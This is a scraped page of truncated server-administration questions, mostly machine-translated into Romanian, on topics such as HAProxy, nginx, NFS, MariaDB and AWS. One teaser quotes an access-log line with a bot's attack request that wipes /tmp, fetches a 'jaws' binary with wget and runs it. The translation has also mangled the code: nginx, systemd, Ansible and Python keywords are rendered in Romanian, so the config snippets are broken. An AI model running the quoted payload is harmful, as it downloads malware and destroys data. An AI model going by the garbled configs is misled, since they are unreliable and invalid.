Ultimele Server intrebări

Am o întrebare cu privire la infrastructura și configurarea pool-urilor de proxy gestionate.

Multe servicii proxy oferă acces la un grup rotativ de proxy printr-un singur ip, folosind auth pentru specificarea parametrilor de acces, id-ul sesiunii etc.

Un exemplu în acest sens ar fi BrightData, denumit anterior Luminati.io: ​​http://lum-customer--zone--session--const:[email protected] ...

Încerc să obțin haproxy să folosească acls cu SNI și nu cooperează. Prezintă certificatul corect, așa că SNI trebuie să funcționeze. Cu toate acestea, nu îl pot face să selecteze un backend pe baza numelui de gazdă din SNI.

Pe care le verific configurația, primesc următoarele

[AVERTISMENT] (21486): Proxy „fe-dr-totalflood.com”: Preluări de eșantion L6 ignorate pe proxy-urile HTTP  ...

Administrez două servere care au fost setate de un administrator anterior, unul funcționează ca server NFS, celălalt client și au o conexiune dedicată 10GBase-T. Ambele servere au fost recent actualizate de la Debian 8 la 11 conform cerințelor managementului. Actualizările nu au arătat erori legate de TCP/IP sau NFS și înainte de actualizare, conexiunea NFS era aparent stabilă. După actuali ...

Încerc să montez o partiție cu dd pe baza acestui articol: https://www.utilities-online.info/articles/Mount-an-LVM-partition-image-cloned-with-dd.

Totuși am tot aceeași eroare.

Pașii mei:

root@vagrant:/root# fdisk -l out.dd 
Disk out.dd: 3,1 GiB, 3371216896 octeți, 6584408 sectoare
Unități: sectoare de 1 * 512 = 512 octeți
Dimensiunea sectorului (logic/fizic): 512 octeți / 512 octeți
Dime ...

Mă pregătesc să rulez un cluster MariaDB cu HA și caut cele mai bune practici.

Cu ani în urmă, obișnuiam să rulez MariaDB în modul master-master și a fost o mare problemă.ori de câte ori oricare dintre noduri (două noduri în total) a fost deconectat și reconectat pentru o secundă, întreaga bază de date era inaccesibilă până la finalizarea procesului de sincronizare.

Am căutat mul ...

Portul http trebuie să fie disponibil pentru o altă utilizare.
Portul 80 al paginii de statistici trebuie să fie închis sau mutat într-un alt port.
Îndepărtarea modul http în Mod implicit secțiunea dezactivează pagina. echo >/dev/tcp/hostname/80 returnează „0” -> portul 80 este deja accesibil.

Un utilizator IAM din contul nostru aws încearcă să preia un anumit secret de la Secrets Manager prin aws cli, dar nu poate face asta, deși ar trebui să aibă permisiuni necesare:

aws secretsmanager get-secret-value --secret-id "config/my/secret"

Acest lucru eșuează cu eroare accesul la km nu este permis. Folosim DefaultEncryptionKey pentru criptarea secretului și a politicii de cheie (gestionat ...

Am un server care rulează Ubuntu 20.04 LTS conectat printr-o interfață ethernet fizică la internet. Prodiverul meu mi-a atribuit un IP4 primar static (voi folosi A.A.A.A aici pentru acest IP), așa că fișierul meu de configurare systemd-networkd arăta așa înainte (netplan dezactivat pentru a funcționa direct cu systemd-networkd):

# /etc/systemd/network/20-enp7s0.network
[Meci]
Nume=enp7s ...

Am observat că primesc unele erori SELinux când rulez mongod pentru programul controler UniFi. Și anume, primesc:

SELinux împiedică /usr/bin/mongod accesul la căutare în directorul /.

SELinux împiedică /usr/bin/mongod accesul la căutare în directorul /var/lib/nfs

SELinux împiedică /usr/bin/mongod accesul la căutare în directorul fs

SELinux împiedică /usr/bin/mongod accesul  ...

Mulțumesc pentru timpul acordat. Am portat o instanță lightsail la EC2 și rulez un server t.2 mai mare. Am un site wordpress și pagina de pornire este doar o pagină albă goală.

Am atribuit ec2 un IP elastic și pot accesa serverul wordpress la acest IP 52.27.6.201 Dar domeniul, www.showstream.io nu este disponibilă. Are cineva idei?

Pot îndrepta domeniul către instanța lightsail și nu f ...

Văd asta în jurnalul meu

„POST /openDoor HTTP/1.1” 301 169 „-” „PostmanRuntime/7.29.0”

„GET /openDoor/ HTTP/1.1” 200 113 „https:///openDoor” „PostmanRuntime/7.29.0”

Fac un POST către /openDoor și primesc un 301. de ce?

Fișierul meu de configurare nginx este acesta

Server {

    client_body_buffer_size 30M;
    client_max_body_size 30M;


    locație ~ \.php$ { ...

222.187.223.158 - - [17/Feb/2022:15:41:02 +0000] „GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1 " 444 0 "-" "Bună, lume" "http://127.0.0.1"

167.248.133.47 - - [17/Feb/2022:15:45:11 +0000] „\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEF\xC512\x xA4\x1D\xEF\xC4}bA!\x18\x08\xBC\x82X7\x12wuv\x1DD\x00\x8FYJ\xF8\xA6\x0E \x86N\xD1\xBB2z\xC7\xF5i\x96\x96\xDB \xE3\x1F\xD5\x5C\xB1\ ...

Instalarea lui Courier 1.0.6-1build2 pe Ubuntu 20.04 eșuează, deși pachetul de curier este cel oferit de sistemul de operare. Problema apare într-un script post-instalare care lasă pachetul instalat, dar neconfigurat și toate pachetele dependente au probleme.

Situația a fost raportată la Ubuntu (vezi https://bugs.launchpad.net/ubuntu/+source/courier/+bug/1877862), dar în afară de âºconf ...

%HOSTNAME% nu este injectat în toate jurnalele care sunt primite. Ele provin de la aceeași adresă IP și majoritatea sunt marcate. Cu toate acestea, unii dintre ei pur și simplu nu primesc un nume de gazdă în fața lor. În acest mediu, nu există DNS de la interfața de la care provin aceste jurnale. Pentru a face față acestui lucru, am inserat numele și IP-ul expeditorului în fișierul hosts ...

Încerc să închid portul cu autentificarea de bază (pentru pushgateway-ul lui prometheus), deci nu sunt un mare specialist în nginx, așa că ar putea cineva să-mi dea vă rog un sfat unde greșesc?

Am portul 9091, care ar trebui să fie închis din exterior în fața auth. Acest port este utilizat de pushgateway

Configurația mea actuală nginx:

evenimente { }
http {
amonte prometheus {
      serve ...

Încerc să redirecționez traficul localhost pe un anumit port către ip-ul rețelei cu punte

Folosesc urmatoarele

ecou"
rdr trece inet proto tcp de la oricare la orice port 9300 -> 192.168.64.29 portul 9300
rdr trece inet proto tcp de la oricare la orice port 3406 -> 192.168.64.29 portul 3406
rdr trece inet proto tcp de la orice la orice port 1234 -> 127.0.0.1 portul 8000
" | sudo pfctl - ...

Pe serverele de la majoritatea/mulți furnizori, pot vedea informații potențial sensibile folosind comenzi precum:

Lista de utilizatori ipmitool 1

sau

ipmitool lan print 1

Sau setați noi utilizatori administratori, care nu necesită autentificare.

Acest lucru nu este neapărat ceva pe care l-ați dori dacă le oferiți altor utilizatori acces liber. Există o modalitate de a împiedica un utilizator ga ...

Încerc să instalez docker-ce folosind rolul debops.docker_server și nu prea reușesc să avansez. Implicit pare să instaleze docker.io pe care nu îl pot folosi deoarece am nevoie de versiuni foarte recente direct de la docker inc.

- gazde: docker_nodes
  deveni: adevărat
  colecții: [ 'debops.debops', 'debops.roles01',
                 „debops.roles02”, „debops.roles03”]

  mediu ...

Am un sistem care utilizează LVM2 cu un singur PV care conține 1 VG care, la rândul său, conține 5 volume logice (/, /Acasă, /var, /schimba, /date).

Când creez un instantaneu al LV / (lvcreate -L 15G -s -n root_snap_test01 /dev/vg01/lv_root), la repornirea ID-ului dispozitivului (folosind ceva de genul stat /acasă) va arăta că ID-ul dispozitivului său a fost incrementat pentru fiecare instant ...

Am următorul URL:

https://my-web.com/path1 și aș dori să redirecționez apelul către https://my-web/path2 dar mi-ar plăcea asta în fila browserului /cale1. Este posibil?

Folosesc un virtualhost în Nginx 1.16. Folosesc o rescrie, dar problema este că în fila browser apare /cale2 si am nevoie /cale1 dar cu continutul drumului1.

EDITAȚI | ×:

cfg-ul meu vhost:

Server {
    rădăcină /var/www/myweb ...

Am o mașină Kali Linux pe care am instalat un server web apache2 pe ea.

Când încerc să accesez serverul folosind HTTP 127.0.0.1, mă redirecționează întotdeauna către https://127.0.0.1 (care nu este configurat) dar http://localhost nu - îl pot accesa folosind portul 80.

Este doar pe portul 80 când 127.0.0.1 redirecționează către https (am încercat să schimb portul apache2 la 8080) și a fu ...

Ubuntu 20.04 strongSwan 5.9.1 (swanctl)

Am urmatoarea eroare:

/usr/sbin/charon-systemd: eroare de căutare a simbolurilor: /usr/lib/ipsec/plugins/libstrongswan-stroke.so: simbol nedefinit: chunk_unmap_clear

Funcționa înainte fără probleme.

Actualizați:

Actualizat la 5.9.5 de la sursă și funcționează din nou. Probabil că unele fișiere au fost corupte.

Am un server nginx pe care l-am instalat pe serverul ubuntu 20.04. Încerc să obțin adresa IP a utilizatorului, dar nginx nu pare să fie configurat să o transmită. când mă uit la jurnalele de acces /var/log/nginx/access.log - pot vedea adresa IP corectă.

Testez această problemă cu un program de bază cu balon de mai jos:

din flask import Flask,jsonify,request

aplicație = Balon (__nume__) ...

Bună, trebuie să creez o imagine Fedora Server cu aplicația mea în ea folosind instalarea kickstart. Am executat următorii pași:

1. Am descărcat imaginea fedora35 de la https://getfedora.org/en/server/download/ (Fedora-Server-dvd-x86_64-35-1.2)
2. montați iso: mount -t iso9660 -o loop Fedora-Server-dvd-x86_64-35-1.2.iso /mnt/
3. mkdir /var/iso
4. cp -a /mnt/ /var/iso
5. cd /var/iso/
6. vim ks.cfg (co ...

În prezent, îmi configurez mașinile virtuale Windows pentru a fi conectate la serverul de licențiere, care este deja configurat, folosind CAL per utilizator. Chiar dacă pare să funcționeze normal, când mă conectez la aparat utilizând RDP, primesc avertismentul că există o problemă cu licența pentru desktop la distanță și voi fi deconectat în 60 de minute.

Această problemă apare ...

Testăm încărcarea unui MIG (cu 2 instanțe) găzduit în spatele echilibratorului de încărcare HTTPs folosind JMeter.

Observația 1: Primim la întâmplare eroare 404 și eroare 503, pentru 404 vedem creată o intrare în monitorizarea echilibrului de încărcare NU_BACKEND_SELECTED (altul decât backend-ul nostru actual MIG). În plus, pentru 503 vedem o intrare creată în monitorizarea echili ...

So I've been banging my head on this issue for a while, hopefully someone can help me here.

My idea is to run a proxy (nginx, traefik, etc) on the public server, with authelia or some other kind of auth helper, and redirect to some services that can be run on the container network behind NAT (think like matrix.org, gitlab server, grafana)

Let's set the stage: there is a physical network, with a router an ...

Eu am :

• Server VPS pe Vultr cu server web și Wordpress instalat.
• Dosarul de încărcări este montat pe compartimentul Amazon S3 folosind s3fs.

Dacă un utilizator descarcă un fișier de 1 GB de pe site-ul meu, traficul îi va fi transmis direct de pe Amazon S3 sau acesta va fi transmis prin vps. Pentru că vreau să descarc lățimea de bandă și aș dori să știu dacă va fi numărată ca 1 ...

Sunt destul de nou în această lume a dispozitivelor SAN/hypervizoarelor ESXi și a altora.

Cu câțiva ani în urmă, aveam servere fizice cu stocare internă conectate la un UPS USB/LAN și ori de câte ori avea o pierdere de energie, declanșam mai întâi o oprire curată a serverului pentru a păstra integritatea datelor și apoi declanșam o oprire totală a UPS (pentru a păstra bateriile  ...

Avem o găleată S3 cu conținut de site web care este oferit publicului printr-un cache proxy. Accesul la găleată este limitat la IP-urile utilizate de proxy. Toate acestea funcționează bine.

Au fost adăugate recent adrese IP noi la proxy, dar nu le putem adăuga la politică. Editarea directă a politicii oferă o „permisiune refuzată”, indiferent de permisiunile pe care le are utiliza ...